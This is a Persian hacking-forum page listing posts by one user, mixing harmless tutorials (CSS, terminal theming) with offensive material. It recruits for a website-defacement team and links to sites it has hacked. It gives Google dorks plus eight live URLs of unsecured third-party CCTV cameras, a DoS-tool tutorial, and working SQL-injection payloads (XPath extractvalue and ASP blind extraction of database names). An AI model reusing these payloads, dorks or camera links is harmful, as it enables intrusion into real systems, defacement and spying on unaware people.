discord icon
سرور دیسکورد گاردایران

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'mr.msa'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


گروه محصول

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

34 نتیجه پیدا شد

  1. MSACMS با سلام خدمت تمام دوستان و مدیران عزیز سایت گاردایران در این تاپیک برای شما یک خدماتی رو می خواهم ارائه بدهم نام خدمات msacms هست که سه cms : 1.wordpress 2.drupal 3.joomla رو بالا اوردم تا بتوانید به صورت رایگان با cms ها کار کنید و اسیب پذیری و باگ پرایوت پیدا کنید ، همچنین اسیب پذیری توی در پوسته ها و پلاگین ها و .... این خدمات مثل یک ازمایشگاه می مونه که مثلا : شما میای روی یکی از cms های دلخواه تست اسیب پذیری انجام می دهید و روی پلاگین های ورژن دلخواه و پوسته دلخواه و ... و مثلا یه کسی که خیلی بلد نیست میاد و کار با cms رو یاد میگیره . و هر دوستی اگر خواست درخواست می دهد و یه cms به صورت دلخواه با ورژن دلخواه برای اون نصب می شود . ادرس خدمات MSACMS : MR-MSA.XYZ : username & password یوزرنیم و پسورد cms ها : guardiran اما زمانی که شما یک cms رو انتخاب می کنید یه یوزر و پسورد می خواد که خیلی قوی هست و فقط یک بار باید بزنید .(برای امنیت بالا این کار انجام شده که هر فردی نتواند استفاده کند ) در ورژن ۱ برای دریافت یوزرنیم و پسورد به صورت خصوصی در سرور discord گاردایران و یا در قسمت پیام رسانی گاردایران باید به من پیام می دادید ، اما در ورژن ۱.۲.۰ برای شما یوزر و پسورد رو در فایل ضمیمه قرار دادم . (در تایپک دوم موجود است ) ------------------------------------------------------------------------------------------------------------------------------------------------------------- نکات مهم زمان استفاده از سایت : ۱- پسورد و یوزر cms ها همیشه guardiran هست و نباید تعویض گردد . ۲- هر روز cms ها چک می شود . ۳- هر ۳ روز یک بار در صورت لزوم cms ها ریست می شوند . ۴- فقط تا ۳ فایل و حداکثر ۱۰ مگابایت می تونید اپلود کنید . ۵- برای دریافت رمز عبور حتما باید در انجمن گاردایران ثبت نام کنید . ۶- اگر یک زمان خواستید برای مثال ببینید که می توان در این اپلودر شل اپلود کرد یا نه به جای شل از یک فایل php استفاده کنید . ۷- هیچ زمان شل اپلود نکنید ، چون اکانت شما به صورت خودکار بن می شود و دیگر قابل برگشت نیست (به دلیل شناسایی فایروال ) ۸- هیچ زمان به سایت حملات ddos نزنید چون موفق نمی شوید . ۹ - این cms به صورت مداوم بروز می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سرور : DDOS در حملات دیداس به شبکه خود دیتاسنتر وارد عمل می شود و آنتی دیداس را فعال می کند در حملات دیداس به سایت ها بخاطر مانیتورینگ لحظه ای که سرور دارد سریعا دسترسی به ایران محدود می شود تا حملات خنثی شود . Firewall در ورژن ۱ سرور دارای فایروال نرم افزاری CSV بود اما در ورژن ۱.۲۰ فایروال cloudflare رو هم اضافه کردیم . Shell سرور دارای انتی شل است و به علاوه فایروال مانع اجرا و استفاده از شل می شود . Backup سایت روزانه بک اپ گیری می شود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- امنیت سایت : سعی کردم روی امنیت سایت کار کنم و سایتی با خدمات خوب و البته امنیت بالا ارائه بدهم و در آینده امنیت بالا تر رفته و سایت بهبود می بخشد. ------------------------------------------------------------------------------------------------------------------------------------------------------------- گزارش باگ : اگر دوستی با باگی در خود سایت مواجه شد و یا دوست داشت مورد امنیتی رو در رابطه با خود سایت گزارش بدهد به صورت خصوصی به من گزارش بده تا رفع بشود . ------------------------------------------------------------------------------------------------------------------------------------------------------------- CMS مورد نظر : اگر دوستی cms خواست تا براش نصب کنم به من پیام خصوصی بدهد . اطلاعات شامل : نوع cms ورژن مورد نظر لینک دانلود ------------------------------------------------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : هر سوال داشتید در بخش سوال و جواب ها ، در غیر این صورت پاسخ داده نمی شود . انتقادات و پیشنهادات خودتون رو به صورت خصوصی به من ارسال کنید . مشکلات و خطا ها رو به صورت خصوصی ارسال کنید . ------------- ------------- ------------- تایید شده توسط مدیران بخش ‌: R3DN4X314 و proxy ------------- ------------- ------------ ورژن 1.0.0 رونمایی می کند : mr-msa.xyz ورژن 1.2.0 رونمایی می کند : mr-msa.xyz ورژن 1.3.0 رونمایی می کند : mr-msa.xyz این خدمات به صورت کامل متعلق به انجمن تیم امنیتی گاردایران بوده و هر گونه کپی برداری ، اسیب رساندن به خدمات و ... تخلف محسوب می شود و پیگرد قانونی دارد .
  2. با سلام خدمت تمامی اساتید انجمن تیم امنیتی گاردایران . این تاپیک برای ارائه ابزار های نوشته شده توسط کاربران دیفیسر گاردایران در سرور دیسکورد هست . که بیشتر ابزار ها رو خودم تاپیکش رو می زارم مگر اینکه نویسنده ابزار موافق نباشد . اعضای دیفیسر (غیر رسمی ) : 1- @proxy 2- @MR.MSA 3- @sign4l 4-@mbdev12 5- @HCSH4C39 6- @mmj-sys مشارکت در تیم دیفیس : شما با هر سطح علمی در زمینه هک ، کم(صفر) ، متوسط و حرفه ای می توانید در تیم دیفیس شرکت کنید . برای مشارکت و آموزش و شروع به دیفیس به سرور دیسکورد گاردایران مراجعه کنید . لینک های مهم : سرور دیسکورد گاردایران دیفیسر ها سایت های هک شده توسط تیم امنیتی گاردایران موفق و پیروز باشید .
  3. با سلام خدمت دوستان عزیز گاردایران در این تاپیک قصد دارم زبان برنامه نویسی CSS رو به شما آموزش بدهم . ----------------------------------------------------------------------------------------------------------------------- ابتدا کمی با css اشنا شویم :‌ css یک زبان برنامه نویسی تحت وب هست که بیشتر در کنار html استفاده می شود ، این زبان برای طراحی سایت از نظر ظاهری هست . برای مثال رنگ متن ها ، پس زمینه ، نوع اسکرول و ... رو با css طراحی می کنند . امروزه که بیشتر افراد به طراحی وب و برنامه نویسی تحت وب روی اورده اند زبان css می تونه زبان کاربردی باشه . پیش نیاز css ، اشنایی با زبان html هست . دیگه بیشتر از این سرتون رو درد نمیارم . 😄 ----------------------------------------------------------------------------------------------------------------------- سبک های اضافه کردن css به html : ۱- خارجی و یا External ۲- داخلی و یا internal ۳- درون خطی و یا inline که در تاپیک بعد به همراه مثال خدمتتون عرض می کنم . ----------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : اسپم ندید . سوالات رو در پ.خ ارسال کنید . کتاب و مقالات رو در اینجا ارسال نکنید . (مگر اینکه خودتون نوشته باشید) اگر قصد گذاشتن آموزشی در رابطه با css دارید ابتدا به من پیام دهید (در غیر این صورت پست شما حذف می شود ) . موفق و پیروز باشید .
  4. با سلام خدمت دوستان عزیز گاردایران . من توی کانال های مختلف هک ، لینوکس ، برنامه نویسی .. هستم و بعضی ها رو می بینم که تم ترمینالشون رو عوض می کنن که خیلی جذابیت می ده به کار ما هکر ها . پس منم رفتم نحوه تغییر تم رو یاد گرفتم ، توی انجمن که گشتم چنین پستی نبود ، پس گفتم اموزشش رو بزارم . خب ابتدا دستورات زیر به ترتیب می زنید : > sudo apt install figlet > sudo apt install lolcat > sudo apt install gem > sudo apt install ruby Figlet : برای اینکه بتونیم یک متن رو به صورت بزرگ برای مثال Mr.MSA رو زمانی که ترمینال باز می شود نمایش دهیم از figlet استفاده می کنیم . که فونت های مختلف در اینجا موجود است. lolcat : برای اینکه به متن خودمون رو به صورت رندم رنگ هایی رو بدیم از lolcat استفاده می کنیم . Gem & Ruby : پیشنیاز های lolcat . حالا برای اینکه بتونیم از lolcat استفاده کنیم از این دستور استفاده می کنیم : gem install lolcat و برای اینکه سیستم ابزار ها رو بشناسه از این دستور استفاده کنید : sudo apt update ---------------------------------------------------------------------------------------------------------------- خب حالا شما با دستور زیر می تونید متن خودتون رو بصورت بنر و رنگ های رندم نمایش دهید : figlet MR.MSA | lolcat خب حالا می خواهیم برای همیشه زمانی که ترمینال رو باز می کنیم این متن رو نمایش بده . ابتدا oh my zsh رو نصب کنید : نصب با curl : sh -c "$(curl -fsSL https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh)" نصب با wget : sh -c "$(wget https://raw.github.com/ohmyzsh/ohmyzsh/master/tools/install.sh -O -)" نصب با github : https://github.com/ohmyzsh/ohmyzsh.git نصب تم در zsh : بعد از نصب zsh شما ابتدا این دستور رو می زنید : cd ~ بعد این دستور برای ادیت کردن فایل .zshrc vim .zshrc در اون فایل دنبال این کلمه بگردید : ZSH_THEME="robbyrussell" اون کلمه ای که بین " است نام تم zsh هست که به صورت پیش فرض robbyrussell هست . برای تغییر دادنش شما باید به این ادرس بروید : https://github.com/ohmyzsh/ohmyzsh/wiki/Themes و بر اساس عکس هایی که گذاشته شده نام تم رو انتخاب کنید و در این قسمت قرار دهید : ZSH_THEME=" نام تم مورد نظر " نمایش بنر دلخواه با رنگ رندم : برای اینکار در همان فایل .zshrc در خط اخر این دستور رو بزاید : figlet 'Mr.MSa' | lolcat و به جای Mr.MSA متن مورد نظر خودتون رو بنویسید . حالا این کلید ها رو به ترتیب روی کیبورد برای خارج شدن از ادیتور vim و سیو کردنش فشار دهید : 1) esc 2) : 3) w 4) q حالا در قسمت edit profile ترمینال در قسمت کامند شل پیش فرض که bash هست رو به zsh تغییر بدید یعنی : /bin/bash به این تغییر می کنه : /bin/zsh حالا یک بار از ترمینال خارج بشید و دوباره ترمینال رو باز کنید و مشاهده می کنید که ترمینال شما نسبت به روز اول زیبا تر شده است . و می توانید با دستورات zsh چیز های دیگه هم بزارید یا حتی همین دستور رو چند بار دیگه بنویسید با متن های مختلف . این یه فایل PDF آموزشی است که دوست عزیز دیفیسرمون HCSH4C39 نوشته که می تونید به همراه این تاپیک از این آموزش هم استفاده کنید : HCSH4C39.pdf موفق و پیروز باشید .
  5. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : https://www.youtube.com/channel/UCLkbfmELZBnOvh1dwK1hXZw چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
  6. با سلام خدمت کاربران و مدیران گارد ایران " پست رو پیشنهاد می کنم تا آخر بخوانید . " در این پست قصد دارم یک افزونه رو به شما معرفی کنم که در خیلی جاها مورد استفاده قرار می گیرد ، افزونه BigBlueButton (برای وردپرس ) که شما می توانید با استفاده از این افزونه، کلاس انلاین ، آموزش های آنلاین و ... برگذار کنید ؛ تقریبا نود درصد از امکانات یک کلاس آنلاین (اسکای روم و...) رو دارد و میزان عملکردش هم میشه گفت متوسطه رو به بالا هست و ترافیک خوبی دارد . بهتون پیشنهاد می کنم . این افزونه رایگان است و فقط کافی در وردپرس عبارت BigBlueButton رو جست و جو کنید و افزونه رو دانلود کنید . استفاده کردن ازش خیلی ساده هست و دو نوع دسترسی دارد : استاد و دانشجو ؛ اگر بخواهم ویژگی هاش رو بگم پست خیلی طولانی میشود خودتون بروید و ببینید . یک نکته در رابطه با ترافیک : چند روز پیش این افزونه رو برای یک دانشگاه گذاشتم که ۳ کلاس تقریبا ۲۰ نفره در یک ساعت داشت برگذار می شد و گزارش دادن که بعضی دانشجویان صفحه برایشان لود نمی شد و با فیلتر شکن وارد شدن این نکته رو گفتم که اگر یک نفر با این مشکل روبرو شد نگران نباشد . "امیدوارم لذت برده باشید و خوشتون اومده باشه ." bigbluebutton.zip
  7. با سلام خدمت دوستان سوالاتی که در رابطه با MSACMS هست رو در اینجا بپرسید . اگر کسی با MSACMS اشنایی ندارد این تاپیک رو تا اخر بخونه :‌
  8. در این تاپیک دورک دوربین های مداربسه رو قرار دادم براتون و یه سری دوربین مداربسته که می توانید راحت تماشا کنید . inurl:"view.shtml" "Network Camera" "Camera Live Image" inurl:"guestimage.html" inurl:/ViewerFrame? intitle:"Network Camera NetworkCamera" intitle:NetworkCamera intext:"Pan / Tilt" inurl:ViewerFrame inurl:/live.htm intext:"M-JPEG"|"System Log"|"Camera-1"|"View Control" inurl:"MultiCameraFrame?Mode=Motion" intitle:"IP CAMERA Viewer" intext:"setting | Client setting" allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 "Network Camera " Display Cameras intitle:"Express6 Live Image" intitle:"Orite IC301" camera linksys inurl:main.cgi دورک های زیادی در سایت های مختلف هست ولی این ها رو دونه دونه چک کردم تا بتوانید راحت تر استفاده کنید . این دوربین های مداربسته رو از همون دورک ها بدست اوردم و همین الان لینک ها چک شده . http://corp.glaztech.com:83/m/ViewerFrame?Mode=Motion&Resolution=640x480&Quality=Standard&Interval=30&Size=STD&PresetOperation=Move&Language=4 http://82.62.121.150/cgi-bin/guestimage.html http://75.145.165.113:86/ViewerFrame?Mode=Motion&Language=4 http://wwww.kelhess.com:82/ViewerFrame?Mode=Refresh&Language=4 http://130.191.35.82/live.htm http://184.185.210.241/ViewerFrame?Mode=Motion&Language=0 http://129.2.122.140/view/index.shtml http://99.43.4.246/main.cgi?next_file=main2.htm "منبع : exploit-db.com " امیدوارم لذت برده باشید ، دونه دونه لینک چک کردن سخت هست تشکر فراموش نشه لطفا . 😄 موفق و پیروز باشید .
  9. MR.MSA

    آموزش ابزار john

    با سلام خدمت کاربران و مدیران عزیز در این تاپیک برای شما یک ویدئو آماده کردم که ابزار john رو آموزش دادم . دو تا از حالت های پر کاربرد رو آموزش دادم امیدوارم اذت ببرید . از این ابزار می توانید برای گسترش پسورد لیست و کرک هش و ... استفاده کنید . امیدوارم لذت برده باشید و اگه لایک کنید ابزار های بیشتری رو قرار می دم . پیروز و سربلند باشید 😆.
  10. با سلام خدمت شما دوستان عزیز در این تاپیک قصد دارم ابزار Hammer که برای حملات dos و ddos استفاده می شود رو به شما آموزش بدهم . برای شما یک ویدئو آموزشی آماده کردم : در فایل ضمیمه برای شما آموزش تصویری رو آماده کردم تا بتوانید بهتر این ابزار رو یاد بگیرید . فرمت : PDF به شما هم آموزش ویدئویی رو پیشنهاد می کنم و هم آموزش تصویری ، پیروز باشید 😁 Hammer Image.pdf
  11. MR.MSA

    برسی مرورگرها

    با سلام خدمت دوستان عزیز در این تاپیک قصد دارم که مرورگر ها رو باهم برسی کنیم . این روز ها شاید بعضی هکر ها بین چند مرورگر اختلاف نظر داشته باشند برای همین باهم اینجا این ها رو برسی میکنیم . ما می خواهیم مرورگرهای کروم ، فایرفاکس ،‌ تور و اپرا رو برسی کنیم که جز قوی ترین مرورگر ها هستند و بین ما هکر ها محبوبیت دارد ، خب بریم برسی رو شروع کنیم . اولین مرورگر یعنی Google Chrome ‌: همانطور که می دانید کروم متعلق به شرکت گوگل هست و گوگل یک موتور جستوجو قوی هست و بیشتر هکر ها از google استفاده می کنند به خاطر دورک ، امنیت ، سرعت و.... گوگل كروم به عنوان يكی از پركاربردترين مرورگرها در سراسر جهان شناخته می‌شود و بین خیلی ها محبوبیت دارد . از جمله ویژگی های کروم می توانیم اشاره کنیم به : سازگاری خوب با گوگل و نسخه های مختلف سرعت خوب و سازگاری با سیستم عامل های Windows، macOS، Linux، Android، iOS افزونه های بسیار زیاد و نرم افزار های افزودنی که داره جذابش می کنه (اما بعضی افزونه ها خوب کار نمی کند ) توضیحات : Chrome 79 به هیچ وجه مرورگر بدی نیست و پشتیبانی و همگام سازی متقابل پلتفرم ، ویژگی های خودکار کامل و برخی ابزار های خوب عالی برای توسعه دهندگان وب است . این می تواند به شما هشدار دهد اگر ایمیل شما به خطر بیفتد، از جستجوی DNS مطمئن برای ارائه دهندگان سازگار برخوردار است (خود DNS عمومی Google یکی از آنهاست) و بسیاری از محتوای مخلوط خطرناک مانند اسکریپت ها و تصاویر را در اتصالات غیرقابل اطمینان مسدود می کند. همچنین WebXR API را برای AR و VR فعال می کند. و .... نکات مثبت مرورگر کروم : حالت تاریک Chrome یک نکته مثبت است که می توانم بهش اشاره کنم . گوگل کروم به طور مداوم در لیست امن ترین مرورگرها قرار دارد و همانطور که گفتم و خبر دارید امنیت بسیار بالایی دارد. در تست های هک عملکرد خوبی دارد و بروزرسانی های مداوم و ماهیانه ای که داره شما رو بروز قرار می دهد. در مسابقات سالانه هک کردن Pwn2Own در چندین نوبت (و همچنین جوایز امنیتی دیگر) بخش “امن ترین مرورگر” را به دست آورد. نکات بدی که داره : عمده موارد مربوط به حریم خصوصی ، برنامه های افزودنی مرورگر می تواند باعث ایجاد مشکلات امنیتی و ... شود . میرویم سراغ مرورگر دوم یعنی Firefox : مرورگر فایر فاکس یک مرورگر محبوب در سرار جهان است که بیشتر خود ما ایرانی ها از این مرورگر استفاده می کند ، من هکر های زیادی رو تا به حال دیدم که از فایرفاکس استفاده می کنند ، فایرفاکس رقیب کروم هست و توی امنیت خیلی خوب خودش رو ثابت کرده است . از جمله ویژگی ها می توانیم اشاره کنیم به سرعت بالا مرورگر افزونه ها و ابزار های افزودنی افزونه های مورد استفاده در هک مثل hackbar و live http header (در کروم هم موجود هستند) نسخه های مختلف مرورگر ، برای توسعه دهندگان وب و درميان توسعه‌هندگان فايرفاكس احتمالا محبوب‌ترين مرورگر جهان است. با استفاده از این مرورگر میتوانید به یک خطایاب جاوا اسکریپت دست پیدا کنید. به علاوه ، با نسخه توسعه دهنده فايرفاكس ، شما به موتور CSS نسل بعد (نوشته شده در RUST) دسترسی پيدا خواهيد كرد ، يک سيستم CSS غيرفعال كه اعلان‌هايی كه بر روی صفحه اثر ندارد را غيرفعال می‌كند، و مواردی بيش از اين هم ارائه می‌كند. همچنين یک هاست “Firefox DevTool” برای دسترسی بهتر وجود دارد . پیشنهاد می کنم که اگر از مرورگر فایرفاکس یا کروم استفاده می کنید برای امنیت بالاتر در مرورگر خود از افزونه LastPass برای ذخیره پسورد ها تون استفاده کنید . سعی کردم بیشتر توضیحات رو بدم و امیدوارم لذت برده باشید . شاد باشید 😅
  12. MR.MSA

    2 ابزار کاربردی

    در این تاپیک قصد دارم به شما دو ابزار رو در هک آموزش بدهم . ابزار اول BaseCrack : این ابزار برای دیکد است و از سرعت بالایی برخوردار است و شما می توانید با پایتون ۲ و ۳ این ابزار رو روی سیستم عاملتون اجرا کنید . روش کار به این صورت است که شما یک فایل حاوه ی متن های کدگذاری شده رو بهش میدید و BaseCrack در کمترین زمان برای شما دیکدش می کند . encode های قابل decode : Base16 Base32 Base36 Base58 Base62 Base64 Base64Url Base85 Base91 Base92 نحوه استفاده :‌ ابتدا با این دستورات پیش نیاز های ابزار را نصب می کنیم . git clone https://github.com/mufeedvh/basecrack.git cd basecrack pip install -r requirements.txt -------------- ---------- ------------ ------------ ------------ ------------ ------------ سپس با پایتون ابزار را اجرا می کنیم . python basecrack.py -------------- ---------- ------------ ------------ ------------ ------------ ------------ می توانید برای راهنمایی از سویچ -h هم استفاده کنید : python basecrack.py -h -------------- ---------- ------------ ------------ ------------ ------------ ------------ برای رمزگشایی یک آرگومان از سویچ -b/--base استفاده می کنیم . به این صورت : python basecrack.py -b SGVsbG8gV29ybGQh -------------- ---------- ------------ ------------ ------------ ------------ ------------ برای رمزگشایی چندین رمزگذاری که در یک فایل دارید با سویچ -f و یا --file نکته به جای file.txt ادرس فایل را بنویسید . به این صورت : python basecrack.py -f file.txt و برای اینکه دیکد شده ها در یک فایل قرار گیرند ‌از --output یا -o استفاده می کنیم . python basecrack.py -f file.txt -o output-wordlist.txt -------------- ---------- ------------ ------------ ------------ ------------ ------------ ابزار دوم masscan : برای ابزار دوم یک ویدئو ضبط کردم که می توانید مشاهده کنید . (در یوتیوب اپلود شده و با vpn مشاهده کنید . ) امیدوارم لذت ببرید . (خوش باشید 😁)
  13. MR.MSA

    جلوگیری از باگ RFU

    با سلام خدمت کاربران و مدیران عزیز گارد ایران در این پست قصد دارم به شما نحوه پچ باگ RFU بدم . RFU : Remote File Upload یک توضیح مختصر : هنگام اپلود یک فایل در سرور این اسیب پذیری به وجود می اید که هکر فایل مخرب خودش رو در سرور آپلود می کند (shell) به صورت کلی این اسیب پذیری بسیار خطر ناک است و باعث می شود که هکر دسترسی کامل به سایت بگیرد ولی حالت های دیگری هم وجود دارد که خطر این باگ کمتر می شود مثلا هکر نمی تواند فایل php خودش که شل است رو آپلود کنه به جای آن فایل html خودش که دیفیس پیج است رو آپلود می کنه یه کمی توضیح طولانی شد خب حالا میریم سراغ جلو گیری از باگ RFU در کد نویسی اولین قدم باید فایل ها در یک جای مشخص و خاص باشد می توانید از این دستور استفاده کنید : move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); الان فایل های اپلودی در فولدری به نام Guardiran قرار می گیرند . حالا برای اینکه فایل های php قابل آپلود نباشند : if(end(explode('.',$_FILES['upload']['name'])) !== 'php'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } تا الان آپلودر ما کمی وضعیتش بهتر شده بعضی از سایت ها از این فیلترینگ استفاده می کنند ولی امنیت بسیار پایینی دارد چون زبان php به حروف بزرگ و کوچک حساس است یعنی ما گفتیم با در آخر نام ... php نباشد اما برای مثال هکر با این نام اپلود می کند b374k.PHP که هر دو فرمت php هستند اما از نظر حروف کوچک و بزرگ باهم فرق دارند پس کد های خودمون رو تغییر می دهیم . به این صورت : if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$_FILES['upload']['name']}"); }else{ } الان یک اپلودر با امنیت خوب داریم ولی هنوز با بایپس ها و متد و... امکان دور زدن وجود دارد پس امنیت رو بالا تر می بریم تا کار هکر سخت تر شود . کاری می کنیم که هکر به راحتی فایل خودش رو پیدا نکنه و از تابع rand استفاده می کنیم و کد ها رو به این صورت می نویسیم :‌ if(end(explode('.',$_FILES['upload']['name'])) == 'jpg'){ $ch = rand(); move_uploaded_file($_FILES['upload']['tmp_name'],"Guardiran/{$ch}.jpg"); }else{ } می توانید بعد از else (در غیر این صورت ) خطای خود را با html و css طراحی کنید . چند راه پیشنهادی جهت رفع بهتر باگ RFU : بهتر است که از یک سرور اختصاصی استفاده کنید و فایل های اپلودی خودتون رو در یک سرور دیگر آپلود کنید . دایرکتوری فایل های اپلود با دایرکتری فایل های اصلی متفاوت باشد . امیدوارم از این پست لذت برده باشید . Download Uploader.zip
  14. با سلام خدمت دوستان عزیز در این تاپیک قصد دارم به شما متد Xpath رو آموزش بدهم . Xpath injection کاربرد : 1. مثلا زمانی که در دستور +order+by+99999-- عدد 1 هم که می زنید صفحه لود نمی شود باید از این متد استفاده کنید . 2. زمانی که به ارورnumber of column the diffrent باید از این متد استفاده کنید . 3. زمانی که union…. را می زنید و با وجود اینکه تعداد درست است ولی به شما ستون اسیب پذیر را نشان ندهد . 4. و..... -------------- -------------- -------------- روش استفاده از متد xpath اول از بایپس هایی که بلدید استفاده کنید مثل : منفی پشت عدد ، source ، بزرگ کردن حروف و .... اگر مشکل حل نشد به سراغ این متد میاید . آموزش متد xpath : بدست اوردن ورژن : …..?sa=12+and+extractvalue(rand(),concat(0x7e,version()))-- 0x7e به معنای علامت (~) است . version() به معنای ورژن سایت است. در آموزش بعدی به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  15. با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲‌) 99 ‌< true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>99 = load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>100 = no load and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)=99 = no load --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم .
  16. در کالی لینوکس ۲۰۲۰ دستور ifconfig جواب نمی دهد (در بعضی مواقع) که حتی با چند بار نصب کردن دوباره ی کالی باز هم مشکل بر طرف نمی شود . در این تاپیک قصد دارم یک راه حل برای رفع این موضوع را آموزش دهم . ابتدا دستور whereis ifconfg رو میزنید تا مطمئن شوید که ifconfig نصب شده و ادرسی که به شما میدهد را کپی کنید. احتمالا این آدرس هست : usr/sbin/ifconfig و بعد یک cd بزنید و دستور زیر را وارد کنید : echo $PATH خب الان متغیر محیطی path را فراخوانی کردید ، اگر ادرس : usr/sbin در آن وجود نداشت شما باید آن را اضافه کنید . ابتدا باید وارد فایل etc/environment شوید ، با دستور : sudo vim etc/environment می توانید با ادیتور nano هم بروید ولی من در اینجا با vim رفتم . (این فایل متغیر های محیطی رو ست می کند) چون می خواهیم با دسترسی روت (sudo) برویم احتمال دارد رمز کالی رو بخواهد رمز رو بزنید و بعد این دستور رو در فایل بنویسید خارج شوید . export PATH=$PATH:usr/sbin ( حالا اگر دستور دیگری هم بود ادرسش رو اضافه می کنید . ) و حالا برای کامپایل کردن فایلمون این دستور رو میزنیم : source etc/environment و حالا می بینید که دستور ifconfig اجرا می شود . ( پیشنهاد می کنم برای روبرو نشدن با این جور مشکلات از نسخه 2019.4 کالی استفاده کنید . )
  17. MR.MSA

    Download Keyword

